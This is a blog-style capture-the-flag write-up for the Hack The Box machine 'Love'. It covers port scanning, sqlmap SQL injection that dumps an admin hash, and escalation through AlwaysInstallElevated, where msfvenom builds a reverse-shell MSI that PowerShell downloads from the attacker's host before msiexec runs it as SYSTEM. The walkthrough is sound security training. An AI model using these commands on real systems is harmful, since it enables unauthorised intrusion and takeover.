Love

Love is an easy machine from Hack The Box.

Enumeration

First step, as always, is to scan the target with nmap:

nmap -sC -sV -oN enum/nmap -v -p- 10.10.10.239

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)  ## PHP voting system
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC                                ##
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn                        ## Nothing from nbtscan
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)      ## 403
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Issuer: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-01-18T14:00:16
| Not valid after:  2022-01-18T14:00:16
| MD5:   bff0 1add 5048 afc8 b3cf 7140 6e68 5ff6
|_SHA-1: 83ed 29c4 70f6 4036 a6f4 2d4d 4cf6 18a2 e9e4 96c2
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
| fingerprint-strings: 
|   NULL, WMSRequest: 
|_    Host '10.10.14.22' is not allowed to connect to this MariaDB server
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Issuer: commonName=LOVE
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-11T14:39:19
| Not valid after:  2024-04-10T14:39:19
| MD5:   d35a 2ba6 8ef4 7568 f99d d6f4 aaa2 03b5
|_SHA-1: 84ef d922 a70a 6d9d 82b8 5bb3 d04f 066b 12f8 6e73
|_ssl-date: 2021-07-02T13:25:42+00:00; +26m47s from scanner time.
| tls-alpn: 
|_  http/1.1
7680/tcp  open  pando-pub?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=7/2%Time=60DF0CE0%P=x86_64-pc-linux-gnu%r(NUL
SF:L,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.22'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(WMSRequest,4A
SF:,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.22'\x20is\x20not\x20allowed\x2
SF:0to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

A lot of open ports, but starting with the web servers is usually a safe bet.

Pasted image 20210702075723

Port 80 is a “voting system”. I can’t get into the login but enumerating directories reveals some more options.

gobuster dir -u http://10.10.10.239 -w /usr/share/wordlists/dirb/common.txt -o enum/gobuster.out

Exploitation

After looking at some of the available web pages, http://10.10.10.239/admin/includes/footer.php provides a hint about the CMS behind the website.

Pasted image 20210714102248

Doing some googling turns up a possible SQLi vulnerability. I capture a login request in Burpsuite, save it, and pass that file to sqlmap to enumerate the DB.

sqlmap --dbms=mysql --batch --level=1 --risk=3 -r voter.req -p voter --dump-all

This being a time-based SQLi, it’s an extremely slow process. There are a few different databases, but votesystem may be the one that I want. I’ll only dump that one for the moment.

sqlmap --dbms=mysql --batch --level=1 --risk=3 -r voter.req -p voter --dump votesystem

+----+-----------------------------+----------+--------------------------------------------------------------+----------+-----------+------------+
| id | photo                       | lastname | password                                                     | username | firstname | created_on |
+----+-----------------------------+----------+--------------------------------------------------------------+----------+-----------+------------+
| 1  | facebook-profile-image.jpeg | Devierte | $2y$10$4E3VVe2PWlTMejquTmMD6.Og9RmmFN.K5A1n99kHNdQxHePutFjsC | admin    | Neovic    | 2018-04-02 |
+----+-----------------------------+----------+--------------------------------------------------------------+----------+-----------+------------+

After about 30 minutes, I’ve gotten an admin hash! In the course of searching for exploits, I also found an authenticated RCE exploit. I wasn’t able to crack the hash with hashcat or john, so I’ll have to just use the hash to authenticate.

Pasted image 20210714112518

Trigger the exploit:

Pasted image 20210714112434

Catch the shell on my listener, and I have a shell on the target as phoebe:

Pasted image 20210714112448

Privilege Escalation

For priv esc on Windows, I like to use AonCyberLab’s Windows Exploit Suggester. All it requires is the output from the Windows target’s systeminfo copied into a file on my local machine.

The script can pull down the most recent Microsoft vulnerability database, so I’ll do that first: python windows-exploit-suggester.py --update

Then run the script:

python windows-exploit-suggester.py --database 2021-07-14-mssb.xls --systeminfo love-sysinfo.txt

The script points out that the registry AlwaysInstallElevated is set to 1 for HKCU(current user) and HKLM(local machine). This should allow me to install .msi packages as SYSTEM.

I’ll build a malicious .msi file containing a reverse shell with msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.22 lport=4444 -f msi > root.msi

Download the file to the target with Powershell, after serving the file on my own web server: powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.22/root.msi','root.msi')"

And execute the file: msiexec /quiet /qn /i root.msi

Pasted image 20210714121312

Just like that, I have a second reverse shell as NT AUTHORITY\SYSTEM.

Pasted image 20210714121354

Written on August 7, 2021